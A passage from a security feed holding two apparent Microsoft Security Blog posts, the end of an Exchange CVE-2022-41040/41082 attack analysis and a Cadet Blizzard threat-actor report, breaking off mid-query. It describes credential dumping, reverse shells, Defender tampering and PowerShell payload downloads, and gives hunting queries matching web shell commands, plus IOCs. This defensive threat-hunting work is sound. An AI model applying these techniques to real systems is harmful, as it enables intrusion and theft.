protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. 
EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Detection\n\n### Microsoft Defender Antivirus\n\n**Microsoft Exchange AMSI integration and Antivirus Exclusions**\n\nExchange has supported integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It is highly recommended to ensure these updates are installed and AMSI is working using the [guidance provided by the Exchange Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/bc-p/2576429/highlight/true>), as this integration provides the best ability for Defender Antivirus to detect and block exploitation of vulnerabilities on Exchange. \n\nMany organizations exclude Exchange directories from antivirus scans for performance reasons. It\u2019s highly recommended to audit AV exclusions on Exchange systems and assess whether they can be removed without impacting performance while still ensuring the highest level of protection. 
Exclusions can be managed via Group Policy, PowerShell, or systems management tools like System Center Configuration Manager.\n\nTo audit AV exclusions on an Exchange Server running Defender Antivirus, launch the _Get-MpPreference_ command from an elevated PowerShell prompt.\n\nIf exclusions cannot be removed for Exchange processes and folders, running Quick Scan in Defender Antivirus scans Exchange directories and files regardless of exclusions.\n\nMicrosoft Defender Antivirus detects the post-exploitation malware currently used in in-the-wild exploitation of this vulnerability as the following:\n\n**Microsoft Defender Antivirus detections**| **MITRE ATT&CK Tactics observed** \n---|--- \n[Exploit:Script/ExchgProxyRequest.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.A&threatId=-2147134610>), [Exploit:Script/ExchgProxyRequest.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.B&threatId=-2147134593>), [Exploit:Script/ExchgProxyRequest.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.C&threatId=-2147134381>) (the most robust defense from Microsoft Defender AV against this threat; requires Exchange AMSI to be enabled)| Initial Access \n[Backdoor:ASP/Webshell.Y](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:ASP/Webshell.Y>)| Persistence \n[Backdoor:Win32/RewriteHttp.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/RewriteHttp.A>)| Persistence \n[Backdoor:JS/SimChocexShell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/SimChocexShell.A!dha&threatId=-2147134707>)| Persistence 
\n[Behavior:Win32/IISExchgDropWebshell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.A!dha&threatId=-2147189378>)| Persistence \nBehavior:Win32/IISExchgDropWebshell.A | Persistence \n[Trojan:Win32/IISExchgSpawnCMD.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/IISExchgSpawnCMD.A&threatId=-2147190657>)| Execution \n[Trojan:Win32/WebShellTerminal.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.A&threatId=-2147189572>) | Execution \n[Trojan:Win32/WebShellTerminal.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.B&threatId=-2147138186>) | Execution \n \n### Microsoft Defender for Endpoint\n\n[Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/security/business/endpoint-security/microsoft-defender-endpoint>) detects post-exploitation activity. 
The following alerts could be related to this threat:\n\n**Indicators of attack**| **MITRE ATT&CK Tactics observed** \n---|--- \nPossible web shell installation | Persistence \nPossible IIS web shell | Persistence \nSuspicious Exchange Process Execution | Execution \nPossible exploitation of Exchange Server vulnerabilities (Requires Exchange AMSI to be enabled)| Initial Access \nSuspicious processes indicative of a web shell | Persistence \nPossible IIS compromise | Initial Access \n \nAs of this writing, Defender for Endpoint customers with Microsoft Defender Antivirus enabled can also detect the web shell malware used in in-the-wild exploitation of this vulnerability with the following alerts:\n\n**Indicators of attack**| **MITRE ATT&CK Tactics observed** \n---|--- \n'Chopper' malware was detected on an IIS Web server | Persistence \n'Chopper' high-severity malware was detected | Persistence \n \n### Microsoft Defender Threat Intelligence\n\n[Microsoft Defender Threat Intelligence](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-defender-threat-intelligence>) (MDTI) maps the internet to expose threat actors and their infrastructure. As indicators of compromise (IOCs) associated with threat actors targeting the vulnerabilities described in this writeup are surfaced, Microsoft Defender Threat Intelligence Community members and customers can find summary and enrichment information for all IOCs within the Microsoft Defender Threat Intelligence portal.\n\n### Microsoft Defender Vulnerability Management\n\nMicrosoft Defender Vulnerability Management identifies devices in an associated tenant environment that might be affected by CVE-2022-41040 and CVE-2022-41082. 
These vulnerabilities have been added to the CISA known exploited vulnerabilities list and are considered in the overall organizational [exposure score](<https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score?view=o365-worldwide>). Customers can use the following capabilities to identify vulnerable devices and assess exposure:\n\n * Use the dedicated dashboard for each of CVE-2022-41040 and CVE-2022-41082 to get a consolidated view of various findings across vulnerable devices and software.\n * Use the _DeviceTvmSoftwareVulnerabilities_ table in advanced hunting to identify vulnerabilities in installed software on devices. Refer to the following query to run:\n \n \n DeviceTvmSoftwareVulnerabilities\n | where CveId in (\"CVE-2022-41040\", \"CVE-2022-41082\")\n \n\nFigure 2: Screenshot of the CVE information page where users can also take a look at related exposed device, software information, open vulnerability page, report inaccuracy, or read other useful references.\n\nNOTE: The assessments above do not currently account for the existence of a workaround mitigation on the device. Microsoft will continue to improve these capabilities based on the latest information from the threat landscape.\n\n## Advanced hunting\n\n### Microsoft Sentinel\n\nBased on what we\u2019re seeing in the wild, Microsoft Sentinel customers can use the following techniques for web shell-related attacks connected to these vulnerabilities. Our post on [web shell threat hunting with Microsoft Sentinel](<https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968>) also provides guidance on looking for web shells in general. 
\n\nThe [Exchange SSRF Autodiscover ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/08a8d2b9c5c9083e341be447773a34b56b205dee/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>) detection, which was created in response to ProxyShell, can be used for queries due to functional similarities with this threat. Also, the new [Exchange Server Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>) and [Exchange Worker Process Making Remote Call](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/ExchangeWorkerProcessMakingRemoteCall.yaml>) queries specifically look for suspicious downloads or activity in IIS logs. In addition to these, we have a few more that could be helpful in looking for post-exploitation activity:\n\n * [Exchange OAB virtual directory attribute containing potential web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/ExchangeOABVirtualDirectoryAttributeContainingPotentialWebshell.yaml>) \n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/WebShellActivity.yaml>) \n * [Malicious web application requests linked with Microsoft Defender for Endpoint alerts](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/MaliciousAlertLinkedWebRequests.yaml>) \n * [Exchange IIS worker dropping web shell](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Execution/exchange-iis-worker-dropping-webshell.yaml>) \n * [Web shell detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/W3CIISLog/PotentialWebshell.yaml>) \n\n### Microsoft 365 Defender\n\nTo locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:\n\n**Chopper web shell**\n\nUse this query to hunt for Chopper web shell activity:\n \n \n 
DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"w3wp.exe\"\n | where ProcessCommandLine has_any (\"&ipconfig&echo\", \"&quser&echo\", \"&whoami&echo\", \"&c:&echo\", \"&cd&echo\", \"&dir&echo\", \"&echo [E]\", \"&echo [S]\")\n \n\n**Suspicious files in Exchange directories**\n\nUse this query to hunt for suspicious files in Exchange directories:\n \n \n DeviceFileEvents\n | where Timestamp >= ago(7d)\n | where InitiatingProcessFileName == \"w3wp.exe\"\n | where FolderPath has \"FrontEnd\\\\HttpProxy\\\\\"\n | where InitiatingProcessCommandLine contains \"MSExchange\"\n | project FileName,FolderPath,SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp\n\n## External attack surface management\n\n### Microsoft Defender External Attack Surface Management\n\n[Microsoft Defender External Attack Surface Management](<https://www.microsoft.com/en-us/security/business/cloud-security/microsoft-defender-external-attack-surface-management>) continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Attack Surface Insights are generated by leveraging vulnerability and infrastructure data to showcase the key areas of concern for your organization.\n\nA High Severity Observation has been published to surface assets within an attack surface which should be examined for application of the mitigation steps described above. 
This insight, titled _CVE-2022-41082 & CVE-2022-41040 - Microsoft Exchange Server Authenticated SSRF and PowerShell RCE_, can be found under the high severity observations section of the Attack Surface Summary dashboard.\n\nThe post [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T04:21:00", "type": "mssecure", "title": "Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T04:21:00", "id": "MSSECURE:C857BFAD4920FD5B25BF42D5469945F6", "href": "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-23T15:26:13", "description": "As Russia\u2019s invasion of Ukraine continues into its second year and Microsoft continues to collaborate with global partners in response, the exposure of destructive cyber capabilities and information operations provide greater clarity into the tools and techniques used by Russian state-sponsored threat actors. 
Throughout the conflict, Russian threat actors have deployed a variety of destructive capabilities with varying levels of sophistication and impact, which showcase how malicious actors rapidly implement novel techniques during a hybrid war, along with the practical limitations of executing destructive campaigns when significant operational errors are made and the security community rallies around defense. These insights help security researchers continuously refine detection and mitigation capabilities to defend against such attacks as they evolve in a wartime environment.\n\nToday, Microsoft Threat Intelligence is sharing updated details about techniques of a threat actor formerly tracked as [DEV-0586](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>)\u2014a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard. As a result of our investigation into their intrusion activity over the past year, we have gained high confidence in our analysis and knowledge of the actor\u2019s tooling, victimology, and motivation, meeting the criteria to convert this group to a [named threat actor](<https://www.microsoft.com/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/>). \n\nMicrosoft assesses that Cadet Blizzard operations are [associated with the Russian General Staff Main Intelligence Directorate (GRU)](<https://blogs.microsoft.com/on-the-issues/2023/06/14/russian-cyberattacks-ukraine-cadet-blizzard/>) but are separate from other known and more established GRU-affiliated groups such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM). 
While Microsoft constantly tracks a number of activity groups with varying degrees of Russian government affiliation, the emergence of a novel GRU affiliated actor, particularly one which has conducted destructive cyber operations likely supporting broader military objectives in Ukraine, is a notable development in the Russian cyber threat landscape. A month before Russia invaded Ukraine, Cadet Blizzard foreshadowed future destructive activity when it created and deployed [WhisperGate](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>), a destructive capability that wipes Master Boot Records (MBRs), against Ukrainian government organizations. Cadet Blizzard is also linked [to the defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as \u201cFree Civilian\u201d.\n\nMicrosoft has tracked Cadet Blizzard since the deployment of WhisperGate in January 2022. We assess that they have been operational in some capacity since at least 2020 and continue to perform network operations through the present. Operationally consistent with the remit and assessed objectives of GRU-led operations throughout Russia\u2019s invasion of Ukraine, Cadet Blizzard has engaged in focused destructive attacks, espionage, and information operations in regionally significant areas. Cadet Blizzard\u2019s operations, though comparatively less prolific in both scale and scope to more established threat actors such as Seashell Blizzard, are structured to deliver impact and frequently run the risk of hampering continuity of network operations and exposing sensitive information through targeted hack-and-leak operations. 
Primary targeted sectors include government organizations and information technology providers in Ukraine, although organizations in Europe and Latin America have also been targeted.\n\nMicrosoft has been [working with CERT-UA](<https://blogs.microsoft.com/on-the-issues/2022/11/03/our-tech-support-ukraine/#:~:text=Since%20the%20war%20began%20in%20February%2C%20Microsoft%20and,critical%20Ukrainian%20services%20through%20data%20centers%20across%20Europe.>) closely since the beginning of Russia\u2019s war in Ukraine and continues to support the country and neighboring states in protecting against cyberattacks, such as the ones carried out by Cadet Blizzard. As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. Microsoft is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Having elevated this activity to a distinct threat actor name, we\u2019re sharing this information with the larger security community to provide insights to protect and mitigate Cadet Blizzard as a threat. Organizations should actively take steps to protect environments against Cadet Blizzard, and this blog further aims to discuss how to detect and prevent disruption.\n\n## Who is Cadet Blizzard?\n\nCadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022. During this time, Russian troops backed with tanks and artillery were surrounding the Ukrainian border as the military prepped for an offensive attack. 
The [defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of key Ukrainian institutions\u2019 websites, coupled with the WhisperGate malware, prefaced [multiple waves of attacks](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd>) by Seashell Blizzard that followed when the Russian military began their ground offensive a month later.\n\nCadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard\u2019s activity peak between January and June 2022, followed by an extended period of reduced activity. The group re-emerged in January 2023 with increased operations against multiple entities in Ukraine and in Europe, including another round of website defacements and a new \u201cFree Civilian\u201d Telegram channel affiliated with the hack-and-leak front under the same name that first emerged in January 2022, around the same time as the initial defacements. Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets\u2019 off-business hours. Microsoft assesses that NATO member states involved in providing military aid to Ukraine are at greater risk.\n\nFigure 1. A heatmap of the operational cadence of Cadet Blizzard\n\nCadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion. While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard. 
Additionally, as is the case with other Russian state-sponsored threat groups, Microsoft assesses that at least one Russian private sector organization has materially supported Cadet Blizzard by providing operational support, including during the WhisperGate destructive attack.\n\n### Targets\n\nCadet Blizzard\u2019s operations are global in scope but consistently affect regional hotspots in Ukraine, Europe, Central Asia, and, periodically, Latin America. Cadet Blizzard likely prioritizes target networks based on requirements consistent with Russian military or intelligence objectives such as geolocation or perceived impact. Cadet Blizzard, consistent with a Russian military-associated threat actor, continues to mainly target Ukraine, although the relative scope of impact of Cadet Blizzard\u2019s destructive activity is minimal compared to the multiple waves of destructive attacks that we attribute to Seashell Blizzard. In January 2022, Cadet Blizzard launched destructive attacks in Ukraine in the following industry verticals:\n\n * Government services\n * Law enforcement\n * Non-profit/non-governmental organizations\n * IT service providers/consulting\n * Emergency services\n\nCadet Blizzard has repeatedly targeted information technology providers and software developers that provide services to government organizations using a supply chain \u201ccompromise one, compromise many\u201d technique. The group\u2019s January 2022 compromise of government entities in Ukraine was probably at least in part due to access and information gained during a breach of an information technology provider that often worked with these organizations.\n\nPrior to the war in Ukraine, Cadet Blizzard also compromised several Eastern European entities, primarily in the government and technology sectors, as early as April 2021. 
As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict. Gaining heightened levels of access into these targeted sectors may also enable Cadet Blizzard to carry out retaliatory demonstrations in opposition to the West\u2019s support for Ukraine.\n\n### Tools, tactics, and procedures\n\nCadet Blizzard is a conventional network operator and commonly utilizes living-off-the-land techniques after gaining initial access to move laterally through the network, collect credentials and other information, and deploy defense evasion techniques and persistence mechanisms. Unlike other Russian-affiliated groups that historically prefer to remain undetected to perform espionage, the result of at least some notable Cadet Blizzard operations are extremely disruptive and are almost certainly intended to be public signals to their targets to achieve the larger objective of destruction, disruption, and possibly, intimidation.\n\nFigure 2. Cadet Blizzard's normal operational lifecycle\n\n**Initial access**\n\nCadet Blizzard predominantly achieves initial access through exploitation of web servers commonly found on network perimeters and DMZs. Cadet Blizzard is also known for exploiting Confluence servers through the CVE-2021-26084 vulnerability, Exchange servers through multiple vulnerabilities including CVE-2022-41040 and ProxyShell, and likely commodity vulnerabilities in various open-source platforms such as content management systems.\n\n**Persistence**\n\nCadet Blizzard frequently persists on target networks through the deployment of commodity web shells used either for commanding or tunneling. 
Commonly utilized web shells include [P0wnyshell](<https://github.com/flozz/p0wny-shell>), [reGeorg](<https://github.com/sensepost/reGeorg>), PAS, and even custom variants included in publicly available exploit kits.\n\nIn February 2023, [CERT-UA reported](<https://cert.gov.ua/article/3947787>) an attempted attack against a Ukrainian state information system that involved a variant of the PAS web shell, which Microsoft assesses to be unique to Cadet Blizzard operations at the time of the intrusion.\n\n**Privilege escalation and credential harvesting** \nCadet Blizzard has leveraged a variety of living-off-the-land techniques to conduct privilege escalation and harvesting of credentials.\n\n * Dumping LSASS \u2013 Cadet Blizzard uses Sysinternals tools such as _procdump_ to dump LSASS in suspected offline credential harvesting efforts. Cadet Blizzard frequently renames _procdump64_ to alternative names, such as _dump64.exe_.\n * Dumping registry hives \u2013 Cadet Blizzard extracts registry hives using native means via _reg save_.\n\n**Lateral movement** \nCadet Blizzard conducts lateral movement with valid network credentials obtained from credential harvesting. To conduct lateral movement more efficiently, Cadet Blizzard typically uses modules from the publicly available [Impacket framework](<https://github.com/fortra/impacket>). While this framework is generically utilized by multiple actors, preferential execution of patterns of commands may allow for more precise profiling of Cadet Blizzard operations:\n\n * PowerShell _get-volume_ to enumerate the volumes on a device\nFigure 3. PowerShell _get-volume_ command\n\n * Copying critical registry hives that contain password hashes and computer information\nFigure 4. Copying critical registry hives\n\n * Downloading files directly from actor-owned infrastructure via the _DownloadFile_ method of the .NET _System.Net.WebClient_ class, called from PowerShell\nFigure 5. 
PowerShell _DownloadFile_ call\n\n**Command execution and C2**\n\nCadet Blizzard periodically uses generic socket-based tunneling utilities to facilitate command and control (C2) to actor-controlled infrastructure. Payloads such as NetCat and Go Simple Tunnel (GOST) are commonly renamed to blend into the operating system but are used to shovel interactive command prompts over established sockets. Frequently, remote command execution may be facilitated through remotely scheduled tasks. The group has also sparingly utilized Meterpreter.\n\nFigure 6. Scheduled task creating a reverse shell\n\n**Operational security**\n\nCadet Blizzard utilizes anonymization services IVPN, SurfShark, and Tor as their anonymization layer during select operations.\n\n**Anti-forensics** \nCadet Blizzard has been observed leveraging the _Win32_NTEventlogFile_ WMI class from PowerShell (its _BackupEventlog_ method writes a copy of a log to an arbitrary path) to extract both system and security event logs to an operational directory. This activity is assessed to be consistent with anti-forensics.\n\n * Common file targets during extraction are:\n   * _sec.evtx_\n   * _sys.evtx_\n * Cadet Blizzard commonly deletes files used during operational phases seen in lateral movement.\n * Cadet Blizzard malware implants are known to disable Microsoft Defender Antivirus through a variety of means:\n   * _NirSoft AdvancedRun_ utility, which is used to disable Microsoft Defender Antivirus by stopping the _WinDefend_ service.\n   * _Disable Windows Defender.bat,_ which presumably disables Microsoft Defender Antivirus via the registry.\nFigure 7. Addition of registry key to disable Microsoft Defender Antivirus\n\n**Impact assessment**\n\nCadet Blizzard typically collects information en masse from targeted servers. If mail servers are affected, Cadet Blizzard typically attempts to collect mail, placing incident response communications at risk. 
Credential material (such as SSH keys) are also a common target to provide methods for re-entry if a full remediation does not occur. As was the case with the WhisperGate operation in January 2022, Cadet Blizzard is known to deploy destructive malware to select target environments to delete data and render systems inoperable.\n\nAlso in January of 2022, Microsoft identified that data exfiltrated by Cadet Blizzard in compromises of various Ukrainian organizations was leaked on a Tor .onion site under the name \u201cFree Civilian.\u201d The organizations from which data was leaked strongly correlated to multiple Cadet Blizzard compromises earlier in 2022, leading Microsoft to assess that this forum is almost certainly linked to Cadet Blizzard. In February 2023, a new Telegram channel was established under the same \u201cFree Civilian\u201d moniker, suggesting that Cadet Blizzard intends to continue conducting information operations in the second year of the war. However, the public channel only has 1.3K followers with posts getting at most a dozen reactions as of the time of publication, signifying low user interaction. A private channel assumed to be operated by the same group appears to have shared data with 748 of those subscribers.\n\nFigure 8. Free Civilian hack-and-leak front\n\n### Related ecosystems\n\nCadet Blizzard operations do not occur in a silo; there have been substantial technical indicators of intersection with other malicious cyber activity that may have a broader scope or a nexus outside of Russia. They have at times utilized services associated with these ecosystems such as Storm-0587, discussed below, as well as having support from at least one private sector enabler organization within Russia. 
Though there have been various forms of intersections in threat activity, when these groups have been observed operating independently, the tactics, techniques, procedures (TTPs) and capabilities have often been distinct\u2014therefore making it operationally valuable to distinguish these activity groups.\n\n**Storm-0587**\n\nStorm-0587 is a cluster of activity beginning as early as April 2021 involving a series of weaponized documents predominantly delivered in phishing operations usually to distribute a series of downloaders and [document stealers](<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>). One of Storm-0587's trademark tools is [SaintBot](<https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader>), an uncommon downloader that often appears in spear-phishing emails. This downloader can be customized to deploy almost anything as the payload, but in Ukraine, the malware often deploys a version of an [AutoIT information stealer](<https://gist.github.com/malwarezone/119bed274bc77b52122fa118f0a72618#file-stealer-au3-L2880>) that collects documents on the machine that threat actors deem of interest. This specific version of the malware has been named [OUTSTEEL by CERT UA](<https://cert.gov.ua/article/18419>) and has been observed in several attacks, such as a fake version of the Office of the President of Ukraine\u2019s website created in July 2021 that hid weaponized documents, including OUTSTEEL, that would download onto victim\u2019s machines when the documents are clicked.\n\n## Mitigation and protection guidance\n\n### Defending against Cadet Blizzard\n\nActivities linked to Cadet Blizzard indicate that they are comprehensive in their approach and have demonstrated an ability to hold networks at risk of continued compromise for an extended period of time. 
A comprehensive approach to incident response may be required in order to fully remediate Cadet Blizzard operations. Organizations can bolster security of information assets and expedite incident response by focusing on areas of risk based on actor tradecraft enumerated within this report. Use the included indicators of compromise to investigate environments and assess for potential intrusion.\n\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers to download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Enable [controlled folder access (CFA)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/controlled-folders>) to prevent MBR/VBR modification.\n * [Block process creations originating from PSExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands>) to stop lateral movement utilizing the wmiexec component of Impacket.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus, turned on by default in Windows, or the equivalent for your chosen antivirus product to cover rapidly evolving attacker tools and techniques. 
Cloud-based machine learning protections block the large majority of new and unknown variants.\n\n### Hunting for Cadet Blizzard hands-on-keyboard activity\n\nTo uncover malicious hands-on-keyboard activities in environments, identify any unusual or unexpected commands or tools launched on systems as well as the presence of any unusual directories or files that could be used for staging or storing malicious tools. Use the common commands, tools, staging directories, and indicators of compromise listed below to help identify Cadet Blizzard intrusion and hands-on-keyboard activity in environments.\n\n**Common commands**\n\n * _systeminfo_ to fingerprint a device after lateral movement\n * _get-volume_ to fingerprint a device after lateral movement\n * _nslookup_ to research specific devices (IP) and FQDNs internally\n * _Get-DnsServerResourceRecord_ to conduct reconnaissance of an internal DNS namespace\n * _query session_ to profile RDP connections\n * _route print_ to enumerate routes available on the device\n * _DownloadFile_ via PowerShell to download payloads from external servers\n\n**Common tool staging directories**\n\n * _C:\\ProgramData_\n * _C:\\PerfLogs_\n * _C:\\Temp_\n * _C:\\_\n * Subdirectories of legitimate (or fake) user accounts within _%APPDATA%\\Temp_\n * Subdirectories with the name _USOPublic_ in the path\n\n**Common tools**\n\n * Tor\n * Python\n * SurfShark\n * Teamviewer\n * Meterpreter named as _dbus-rpc.exe_ in known instances\n * IVPN\n * NGROK\n * _GOST.exe_ frequently masked as _USORead.exe_\n * reGeorg web shell\n\n**Indicators of compromise (IOCs)**\n\nIOC| Type| Description \n---|---|--- \njusticeua[.]org| Domain| Sender for non-weaponized emails containing only antagonistic messaging: _volodimir_azov@justiceua[.]org_ \n179.43.187[.]33| IP address| Hosted the JusticeUA operation between March and April 2022 \n3a2a2de20daa74d8f6921230416ed4e6| PE Import Hash| PE Import Hash matching WhisperGate malware 
\n3e4bb8089657fef9b8e84d9e17fd0d7740853c4c0487081dacc4f22359bade5c| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n20215acd064c02e5aa6ae3996b53f5313c3f13625a63da1d3795c992ea730191| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n3fe9214b33ead5c7d1f80af469593638b9e1e5f5730a7d3ba2f96b6b555514d4| SHA-256| Web shell - WSO Shell (not unique to Cadet Blizzard) \n23d6611a730bed886cc3b4ce6780a7b5439b01ddf6706ba120ed3ebeb3b1c478| SHA-256| Web shell \u2013 reGeorg (not unique to Cadet Blizzard) \n7fedaf0dec060e40cbdf4ec6d0fbfc427593ad5503ad0abaf6b943405863c897| SHA-256| Web shell \u2013 PAS (may not be unique to Cadet Blizzard) \n \n### Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects behavioral components of techniques this threat actor uses as the following:\n\n * Behavior:Win32/WmiprvseRemoteProc\n\nMicrosoft Defender Antivirus detects the WhisperGate malware attributed to this threat actor with the following family:\n\n * WhisperGate\n\n**Microsoft Defender for Endpoint**\n\nThe following Microsoft Defender for Endpoint alerts can indicate associated threat activity:\n\n * Cadet Blizzard activity detected\n * Possible Storm-0587 activity detected\n\nThe following alerts might also indicate threat activity related to this threat. 
Note, however, that these alerts can be also triggered by unrelated threat activity.\n\n * Ongoing hands-on-keyboard attack via Impacket toolkit\n * Suspicious PowerShell command line\n * Suspicious WMI process creation\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-26084\n * CVE-2020-1472\n * CVE-2021-4034\n\n### Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks:\n\nCheck for WMIExec Impacket activity with common Cadet Blizzard commands\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"WmiPrvSE.exe\" and FileName =~ \"cmd.exe\"\n | where ProcessCommandLine matches regex \"2>&1\"\n | where ProcessCommandLine has_any (\"get-volume\",\"systeminfo\",\"reg.exe\",\"downloadfile\",\"nslookup\",\"query session\",\"route print\")\n \n\nFind PowerShell file downloads\n \n \n DeviceProcessEvents\n | where FileName == \"powershell.exe\" and ProcessCommandLine has \"DownloadFile\"\n \n\nScheduled task creation, command execution and C2 communication\n \n \n DeviceProcessEvents \n | where Timestamp > 